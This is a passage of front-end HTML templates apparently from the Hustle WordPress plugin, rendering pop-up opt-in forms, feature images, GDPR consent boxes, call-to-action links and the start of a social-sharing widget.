element.placeholder }}</span> </label> </div> <# } #> <# }); #> <# } #> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #></div><# } #> <# if ( _.isTrue( has_args ) ) { #><div class="hustle-modal-provider-args-container"></div><# } #> <# if ( 'undefined' !== typeof content.form_elements.submit && 'undefined' !== typeof content.form_elements.submit.label ) { #> <div class="hustle-modal-optin_button"> <button type="submit"> <span class="hustle-loading-text">{{ content.form_elements.submit.label }}</span> <span class="hustle-loading-icon"></span> </button> </div> <# } #> </form> <# if ( _.isTrue(content.show_gdpr) && '' !== content.gdpr_message ) { #> <div class="hustle-gdpr-box"> <label for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-checkbox"> <input type="checkbox" id="hustle-modal-gdpr-{{{module_id}}}" class="hustle-modal-gdpr"> <span aria-hidden="true"></span> </label> <div for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-content">{{{ content.gdpr_message }}}</div> </div> <# } #> </div> <# if ( show_recaptcha ) { #> <# } #> </footer> <# } #> <# } #> <# if ( 'four' === design.form_layout ) { #> <# if ( 'left' === design.feature_image_position ) { #> <aside class="hui-modal-sidebar-{{ design.feature_image_fit }}"> <# if ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue(content.feature_image_hide_on_mobile) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <div class="hustle-modal-optin_wrap"> <div class="hui-modal-footer-wrap"> <form class="hustle-modal-optin_form {{ ( _.isTrue(have_mc_group) && 'hidden' !== content.args.group.type ) ? 'hustle-modal-optin_groups' : '' }} {{ ( 'separated' === design.form_fields_proximity ) ? 'hustle-modal-optin_separated' : '' }}" role="form"> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #><div class="hustle-modal-optin_group"><# } #> <# if ( 'undefined' !== typeof content.form_elements && !_.isEmpty( content.form_elements ) ) { #> <# _.each( content.form_elements, function( element, key ) { var element_type = element.type.toLowerCase(); if ( 'recaptcha' === element_type ) { show_recaptcha = true; return; } if ( 'name' === element_type || 'address' === element_type || 'phone' === element_type ) { var input_type = 'text'; } else { var input_type = element_type; } #> <# if ( 'submit' !== key ) { #> <div class="hustle-modal-optin_field {{ ( 'none' !== design.form_fields_icon ) ? 'hustle-modal-field_with_icon' : '' }}"> <input name="{{key}}" class="{{ ( _.isTrue( element.required ) ) ? 'required' : '' }}" type="{{input_type}}" data-error="Please, provide {{element.label.toLowerCase()}}."> <label> <# if ( "none" !== design.form_fields_icon ) { #> <span class="hustle-modal-optin_icon{{ ( 'animated' === design.form_fields_icon ) ? ' hustle-modal-optin_animated' : '' }}"> <# if ( 'email' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="11" viewBox="0 0 14 11" preserveAspectRatio="none" class="hustle-icon hustle-i_email"><path fill-rule="evenodd" d="M.206 1.112L7 7l6.793-5.887c.132.266.207.564.207.88v7.015c0 1.1-.897 1.992-2.006 1.992H2.006C.898 11 0 10.1 0 9.008V1.992c0-.316.074-.615.206-.88zM.94.305C1.247.112 1.613 0 2.005 0h9.988c.392 0 .757.112 1.066.306L7 5.5.94.305z"/></svg> <# } #> <# if ( 'name' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="11" height="14" viewBox="0 0 11 14" preserveAspectRatio="none" class="hustle-icon hustle-i_user"><path fill-rule="evenodd" d="M1.632 6.785c.917 1.118 2.31 1.83 3.868 1.83 1.56 0 2.95-.712 3.868-1.83C10.376 7.533 11 8.787 11 10.8c0 2-2.75 2.5-5.5 2.5S0 12.8 0 10.8c0-2.013.624-3.267 1.632-4.015zM5.5 7C3.567 7 2 5.433 2 3.5S3.567 0 5.5 0 9 1.567 9 3.5 7.433 7 5.5 7z"/></svg> <# } #> <# if ( 'address' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="10" height="15" viewBox="0 0 10 15" preserveAspectRatio="none" class="hustle-icon hustle-i_pin"><path fill-rule="evenodd" d="M5 0c2.442 0 5 1 5 4.5S6.178 12.904 5 15C3.805 12.904 0 8 0 4.5S2.54 0 5 0zm0 6.5c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2z"/></svg> <# } #> <# if ( 'phone' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 14 14" preserveAspectRatio="none" class="hustle-icon hustle-i_phone"><path fill-rule="evenodd" d="M9.947 13.855s-2.94-1.157-5.795-4.01C1.3 6.99.14 4.046.14 4.046c-.28-.605-.125-1.48.347-1.953L2.38.204c.314-.316.746-.258.964.13l1.63 2.91c.218.39.14.96-.177 1.276l-.614.613s.903 1.495 2.044 2.637c1.142 1.14 2.58 1.986 2.58 1.986l.613-.613c.316-.316.886-.394 1.274-.174l2.968 1.68c.388.22.448.652.132.968l-1.892 1.89c-.473.475-1.35.638-1.955.347z"/></svg> <# } #> <# if ( 'text' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="12" height="13" viewBox="0 0 12 13" preserveAspectRatio="none" class="hustle-icon hustle-i_text"><path fill-rule="evenodd" d="M7 10.928v-9.25h3l1 2.25h1l-.188-3.01c-.034-.547-.5-.955-1.062-.915 0 0-1.875.175-4.75.175S1.25.003 1.25.003C.698-.04.222.37.188.917L0 3.927h1l1-2.25h3v9.25l-2 1v1l3-.25 3 .25v-1l-2-1z"/></svg> <# } #> <# if ( 'number' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="13" height="13" viewBox="0 0 13 13" preserveAspectRatio="none" class="hustle-icon hustle-i_number"><path fill-rule="evenodd" d="M3 8V5H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h3V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v3h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H5v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2zm2 0h3V5H5v3z"/></svg> <# } #> <# if ( 'url' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="13" viewBox="0 0 16 13" preserveAspectRatio="none" class="hustle-icon hustle-i_url"><path fill-rule="evenodd" d="M0 2.003C0 .897.895 0 1.994 0h12.012C15.106 0 16 .894 16 2.003v8.994C16 12.103 15.105 13 14.006 13H1.994C.894 13 0 12.106 0 10.997V2.003zm1 0v8.994c0 .557.445 1.003.994 1.003h12.012c.547 0 .994-.45.994-1.003V2.003C15 1.446 14.555 1 14.006 1H1.994C1.447 1 1 1.45 1 2.003zm7 5.33V9H7V4h2c.557 0 1 .447 1 1v1c0 .557-.447 1-1 1h-.2L10 9H9L8 7.333zM8 5h.495c.28 0 .505.232.505.5 0 .276-.214.5-.505.5H8V5zM4.5 8c.268 0 .5-.22.5-.49V4h1v3.5C6 8.326 5.328 9 4.5 9 3.666 9 3 8.328 3 7.5V4h1v3.51c0 .275.224.49.5.49zM12 8h1v1h-1c-.556 0-1-.448-1-1V4h1v4z"/></svg> <# } #> <# if( _.isTrue( element.required ) ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" preserveAspectRatio="none" class="hustle-icon hustle-i_warning" style="display:none"><path fill-rule="evenodd" d="M9 18c-4.97 0-9-4.03-9-9s4.03-9 9-9 9 4.03 9 9-4.03 9-9 9zm.25-3c.69 0 1.25-.56 1.25-1.25s-.56-1.25-1.25-1.25S8 13.06 8 13.75 8.56 15 9.25 15zm-.018-4C8 11 7 3.5 9.232 3.5s1.232 7.5 0 7.5z"/></svg> <# } #> </span> <# } #> <span class="hustle-modal-optin_placeholder">{{ element.placeholder }}</span> </label> </div> <# } #> <# }); #> <# } #> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #></div><# } #> <# if ( _.isTrue( has_args ) ) { #><div class="hustle-modal-provider-args-container"></div><# } #> <# if ( 'undefined' !== typeof content.form_elements.submit && 'undefined' !== typeof content.form_elements.submit.label ) { #> <div class="hustle-modal-optin_button"> <button type="submit"> <span class="hustle-loading-text">{{ content.form_elements.submit.label }}</span> <span class="hustle-loading-icon"></span> </button> </div> <# } #> </form> <# if ( _.isTrue(content.show_gdpr) && '' !== content.gdpr_message ) { #> <div class="hustle-gdpr-box"> <label for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-checkbox"> <input type="checkbox" id="hustle-modal-gdpr-{{{module_id}}}" class="hustle-modal-gdpr"> <span aria-hidden="true"></span> </label> <div for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-content">{{{ content.gdpr_message }}}</div> </div> <# } #> <# if ( show_recaptcha ) { #> <# } #> </div> </div> </aside> <# } #> <# if ( ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) || '' !== content.main_content || ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) ) { #> <section class="hustle-modal-content"> <article> <div class="hustle-modal-article"> <# if ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) { #> <hgroup> <# if ( '' !== content.title ) { #> <h1 class="hustle-modal-title">{{ content.title }}</h1> <# } #> <# if ( '' !== content.sub_title ) { #> <h2 class="hustle-modal-subtitle">{{ content.sub_title }}</h2> <# } #> </hgroup> <# } #> {{{ content.main_content }}} <# if ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) { #> <div class="hustle-modal-footer"> <a target="_{{ content.cta_target }}" href="{{ content.cta_url }}" class="hustle-modal-cta">{{ content.cta_label }}</a> </div> <# } #> </div> </article> </section> <# } #> <# if ( 'right' === design.feature_image_position ) { #> <aside class="hui-modal-sidebar-{{ design.feature_image_fit }}"> <# if ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue(content.feature_image_hide_on_mobile) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <div class="hustle-modal-optin_wrap"> <div class="hui-modal-footer-wrap"> <form class="hustle-modal-optin_form {{ ( _.isTrue(have_mc_group) && 'hidden' !== content.args.group.type ) ? 'hustle-modal-optin_groups' : '' }} {{ ( 'separated' === design.form_fields_proximity ) ? 'hustle-modal-optin_separated' : '' }}" role="form"> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #><div class="hustle-modal-optin_group"><# } #> <# if ( 'undefined' !== typeof content.form_elements && !_.isEmpty( content.form_elements ) ) { #> <# _.each( content.form_elements, function( element, key ) { var element_type = element.type.toLowerCase(); if ( 'recaptcha' === element_type ) { show_recaptcha = true; return; } if ( 'name' === element_type || 'address' === element_type || 'phone' === element_type ) { var input_type = 'text'; } else { var input_type = element_type; } #> <# if ( 'submit' !== key ) { #> <div class="hustle-modal-optin_field {{ ( 'none' !== design.form_fields_icon ) ? 'hustle-modal-field_with_icon' : '' }}"> <input name="{{key}}" class="{{ ( _.isTrue( element.required ) ) ? 'required' : '' }}" type="{{input_type}}" data-error="Please, provide {{element.label.toLowerCase()}}."> <label> <# if ( "none" !== design.form_fields_icon ) { #> <span class="hustle-modal-optin_icon{{ ( 'animated' === design.form_fields_icon ) ? ' hustle-modal-optin_animated' : '' }}"> <# if ( 'email' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="11" viewBox="0 0 14 11" preserveAspectRatio="none" class="hustle-icon hustle-i_email"><path fill-rule="evenodd" d="M.206 1.112L7 7l6.793-5.887c.132.266.207.564.207.88v7.015c0 1.1-.897 1.992-2.006 1.992H2.006C.898 11 0 10.1 0 9.008V1.992c0-.316.074-.615.206-.88zM.94.305C1.247.112 1.613 0 2.005 0h9.988c.392 0 .757.112 1.066.306L7 5.5.94.305z"/></svg> <# } #> <# if ( 'name' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="11" height="14" viewBox="0 0 11 14" preserveAspectRatio="none" class="hustle-icon hustle-i_user"><path fill-rule="evenodd" d="M1.632 6.785c.917 1.118 2.31 1.83 3.868 1.83 1.56 0 2.95-.712 3.868-1.83C10.376 7.533 11 8.787 11 10.8c0 2-2.75 2.5-5.5 2.5S0 12.8 0 10.8c0-2.013.624-3.267 1.632-4.015zM5.5 7C3.567 7 2 5.433 2 3.5S3.567 0 5.5 0 9 1.567 9 3.5 7.433 7 5.5 7z"/></svg> <# } #> <# if ( 'address' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="10" height="15" viewBox="0 0 10 15" preserveAspectRatio="none" class="hustle-icon hustle-i_pin"><path fill-rule="evenodd" d="M5 0c2.442 0 5 1 5 4.5S6.178 12.904 5 15C3.805 12.904 0 8 0 4.5S2.54 0 5 0zm0 6.5c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2z"/></svg> <# } #> <# if ( 'phone' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 14 14" preserveAspectRatio="none" class="hustle-icon hustle-i_phone"><path fill-rule="evenodd" d="M9.947 13.855s-2.94-1.157-5.795-4.01C1.3 6.99.14 4.046.14 4.046c-.28-.605-.125-1.48.347-1.953L2.38.204c.314-.316.746-.258.964.13l1.63 2.91c.218.39.14.96-.177 1.276l-.614.613s.903 1.495 2.044 2.637c1.142 1.14 2.58 1.986 2.58 1.986l.613-.613c.316-.316.886-.394 1.274-.174l2.968 1.68c.388.22.448.652.132.968l-1.892 1.89c-.473.475-1.35.638-1.955.347z"/></svg> <# } #> <# if ( 'text' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="12" height="13" viewBox="0 0 12 13" preserveAspectRatio="none" class="hustle-icon hustle-i_text"><path fill-rule="evenodd" d="M7 10.928v-9.25h3l1 2.25h1l-.188-3.01c-.034-.547-.5-.955-1.062-.915 0 0-1.875.175-4.75.175S1.25.003 1.25.003C.698-.04.222.37.188.917L0 3.927h1l1-2.25h3v9.25l-2 1v1l3-.25 3 .25v-1l-2-1z"/></svg> <# } #> <# if ( 'number' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="13" height="13" viewBox="0 0 13 13" preserveAspectRatio="none" class="hustle-icon hustle-i_number"><path fill-rule="evenodd" d="M3 8V5H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h3V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v3h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H5v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2zm2 0h3V5H5v3z"/></svg> <# } #> <# if ( 'url' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="13" viewBox="0 0 16 13" preserveAspectRatio="none" class="hustle-icon hustle-i_url"><path fill-rule="evenodd" d="M0 2.003C0 .897.895 0 1.994 0h12.012C15.106 0 16 .894 16 2.003v8.994C16 12.103 15.105 13 14.006 13H1.994C.894 13 0 12.106 0 10.997V2.003zm1 0v8.994c0 .557.445 1.003.994 1.003h12.012c.547 0 .994-.45.994-1.003V2.003C15 1.446 14.555 1 14.006 1H1.994C1.447 1 1 1.45 1 2.003zm7 5.33V9H7V4h2c.557 0 1 .447 1 1v1c0 .557-.447 1-1 1h-.2L10 9H9L8 7.333zM8 5h.495c.28 0 .505.232.505.5 0 .276-.214.5-.505.5H8V5zM4.5 8c.268 0 .5-.22.5-.49V4h1v3.5C6 8.326 5.328 9 4.5 9 3.666 9 3 8.328 3 7.5V4h1v3.51c0 .275.224.49.5.49zM12 8h1v1h-1c-.556 0-1-.448-1-1V4h1v4z"/></svg> <# } #> <# if( _.isTrue( element.required ) ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" preserveAspectRatio="none" class="hustle-icon hustle-i_warning" style="display:none"><path fill-rule="evenodd" d="M9 18c-4.97 0-9-4.03-9-9s4.03-9 9-9 9 4.03 9 9-4.03 9-9 9zm.25-3c.69 0 1.25-.56 1.25-1.25s-.56-1.25-1.25-1.25S8 13.06 8 13.75 8.56 15 9.25 15zm-.018-4C8 11 7 3.5 9.232 3.5s1.232 7.5 0 7.5z"/></svg> <# } #> </span> <# } #> <span class="hustle-modal-optin_placeholder">{{ element.placeholder }}</span> </label> </div> <# } #> <# }); #> <# } #> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #></div><# } #> <# if ( _.isTrue( has_args ) ) { #><div class="hustle-modal-provider-args-container"></div><# } #> <# if ( 'undefined' !== typeof content.form_elements.submit && 'undefined' !== typeof content.form_elements.submit.label ) { #> <div class="hustle-modal-optin_button"> <button type="submit"> <span class="hustle-loading-text">{{ content.form_elements.submit.label }}</span> <span class="hustle-loading-icon"></span> </button> </div> <# } #> </form> <# if ( _.isTrue(content.show_gdpr) && '' !== content.gdpr_message ) { #> <div class="hustle-gdpr-box"> <label for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-checkbox"> <input type="checkbox" id="hustle-modal-gdpr-{{{module_id}}}" class="hustle-modal-gdpr"> <span aria-hidden="true"></span> </label> <div for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-content">{{{ content.gdpr_message }}}</div> </div> <# } #> <# if ( show_recaptcha ) { #> <# } #> </div> </div> </aside> <# } #> <# } #> </div> </div> </script> <script id="wpmudev-hustle-modal-without-optin-tpl" type="text/template"> <div class="hustle-modal hustle-modal-{{ ( 'simple' === design.style || 'minimal' === design.style ) ? design.style : 'cabriolet' }}<# if ( ( _.isTrue( content.use_feature_image ) && 'none' === design.feature_image_fit ) && _.isFalse( content.has_title ) && '' === content.main_content && _.isFalse( content.show_cta ) ) { #> hustle-modal-image_only<# } #> {{ ( ( ( '' !== settings.animation_in && 'no_animation' !== settings.animation_in ) || ( '' !== settings.animation_out && 'no_animation' !== settings.animation_out ) ) && ( 'undefined' === typeof is_preview || _.isFalse( is_preview ) ) ) ? 'hustle-animated' : 'hustle-modal-static' }}"> <# if ( 'simple' === design.style ) { #> <# if ( 'embedded' !== module_type ) { #> <div class="hustle-modal-close" aria-hidden="true"><svg width="150" height="150" viewBox="0 0 150 150" xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" class="hustle-icon hustle-i_close"><path d="M91.667 75L150 16.667 133.333 0 75 58.333 16.667 0 0 16.667 58.333 75 0 133.333 16.667 150 75 91.667 133.333 150 150 133.333 91.667 75z" fill-rule="evenodd"/></svg></div> <# } #> <div class="hustle-modal-body hustle-modal-image_{{ design.feature_image_position }}"> <# if ( 'left' === design.feature_image_position && ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue( content.feature_image_hide_on_mobile ) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <# if ( content.main_content !== '' || ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) || ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) ) { #> <div class="hustle-modal-content"> <div class="hustle-modal-wrap--content"> <# if ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) { #> <header class="hustle-modal-header"> <# if ( '' !== content.title ) { #> <h1 class="hustle-modal-title">{{ content.title }}</h1> <# } #> <# if ( '' !== content.sub_title ) { #> <h2 class="hustle-modal-subtitle">{{ content.sub_title }}</h2> <# } #> </header> <# } #> <# if ( '' !== content.main_content ) { #> <div class="hustle-modal-message"> {{{ content.main_content }}} </div> <# } #> <# if ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) { #> <div class="hustle-modal-footer"> <# if ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) { #> <a target="_{{ content.cta_target }}" href="{{ content.cta_url }}" class="hustle-modal-cta">{{ content.cta_label }}</a> <# } #> </div> <# } #> </div> </div> <# } #> <# if ( 'right' === design.feature_image_position && ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue( content.feature_image_hide_on_mobile ) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> </div> <# } else if ( 'minimal' === design.style ) { #> <# if ( 'embedded' !== module_type ) { #> <div class="hustle-modal-close" aria-hidden="true"><svg width="150" height="150" viewBox="0 0 150 150" xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" class="hustle-icon hustle-i_close"><path d="M91.667 75L150 16.667 133.333 0 75 58.333 16.667 0 0 16.667 58.333 75 0 133.333 16.667 150 75 91.667 133.333 150 150 133.333 91.667 75z" fill-rule="evenodd"/></svg></div> <# } #> <div class="hustle-modal-body hustle-modal-image_{{ design.feature_image_position }}"> <# if ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) { #> <header class="hustle-modal-header"> <# if ( '' !== content.title ) { #> <h1 class="hustle-modal-title">{{ content.title }}</h1> <# } #> <# if ( '' !== content.sub_title ) { #> <h2 class="hustle-modal-subtitle">{{ content.sub_title }}</h2> <# } #> </header> <# } #> <# if ( '' !== content.main_content || ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) ) { #> <section class="hustle-modal-content"> <# if ( 'left' === design.feature_image_position && ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue( content.feature_image_hide_on_mobile ) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <# if ( '' !== content.main_content ) { #> <div class="hustle-modal-wrap--content"> <div class="hustle-modal-message">{{{ content.main_content }}}</div> </div> <# } #> <# if ( 'right' === design.feature_image_position && ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue( content.feature_image_hide_on_mobile ) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> </section> <# } #> <# if ( _.isTrue( content.show_cta ) && '' !== content.cta_label && '' !== content.cta_url ) { #> <footer class="hustle-modal-footer"> <# if ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) { #> <a target="_{{ content.cta_target }}" href="{{ content.cta_url }}" class="hustle-modal-cta">{{ content.cta_label }}</a> <# } #> </footer> <# } #> </div> <# } else { // ( 'cabriolet' === design.style ) #> <div class="hustle-modal-body hustle-modal-image_{{ design.feature_image_position }}"> <# if ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) { #><header class="hustle-modal-header hustle-modal-with-title"><# } else { #><header class="hustle-modal-header"><# } #> <# if ( 'embedded' !== module_type ) { #> <div class="hustle-modal-close" aria-hidden="true"><svg width="150" height="150" viewBox="0 0 150 150" xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" class="hustle-icon hustle-i_close"><path d="M91.667 75L150 16.667 133.333 0 75 58.333 16.667 0 0 16.667 58.333 75 0 133.333 16.667 150 75 91.667 133.333 150 150 133.333 91.667 75z" fill-rule="evenodd"/></svg></div> <# } #> <# if ( _.isTrue( content.has_title ) && '' !== content.title ) { #> <h1 class="hustle-modal-title">{{ content.title }}</h1> <# } #> <# if ( _.isTrue( content.has_title ) && '' !== content.sub_title ) { #> <h2 class="hustle-modal-subtitle">{{ content.sub_title }}</h2> <# } #> </header> <# if ( '' !== content.main_content || ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) || ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) ) { #> <section class="hustle-modal-content"> <# if ( 'left' === design.feature_image_position && ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue( content.feature_image_hide_on_mobile ) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <# if ( '' !== content.main_content || ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) ) { #> <div class="hustle-modal-wrap--content"> <div class="hustle-modal-align"> <# if ( '' !== content.main_content ) { #> <div class="hustle-modal-message">{{{ content.main_content }}}</div> <# } #> <# if ( _.isTrue( content.show_cta ) && '' !== content.cta_label && '' !== content.cta_url ) { #> <div class="hustle-modal-footer"> <# if ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) { #> <a target="_{{ content.cta_target }}" href="{{ content.cta_url }}" class="hustle-modal-cta">{{ content.cta_label }}</a> <# } #> </div> <# } #> </div> </div> <# } #> <# if ( 'right' === design.feature_image_position && ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue( content.feature_image_hide_on_mobile ) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> </section> <# } #> </div> <# } #> </div> </script> <script id="hustle-sshare-front-tpl" type="text/template"> <div id="hustle-sshare-module-display" class="hustle-sshare-{{service_type}} hustle-sshare-{{module_display_type}} hustle-sshare-location-{{location_type}} hustle-sshare-module-id-{{module_id}}" > <# if ( 'floating_social' === module_display_type ) { #> <div class="hustle-shares-floating {{ ( _.isTrue(floating_social_animate_icons) ) ? 'hustle-shares-animated' : '' }}"> <# if ( !_.isEmpty(social_icons) ) { _.each( social_icons, function( icon, key ){ #> <a data-social="{{key}}" href="{{ ( 'custom' === service_type ) ? icon.link : '#' }}" {{ ( 'custom' === service_type ) ? 'target="_blank"' : '' }} class="hustle-social-icon hustle-social-icon-{{service_type}} hustle-social-icon-counter-{{click_counter}} hustle-icon-{{icon_style}} {{ ( _.isFalse(customize_colors) ) ? 'hustle-icon-' + key : '' }} {{ ( 'flat' === icon_style && ( 'native' === service_type && 'none' !== click_counter ) 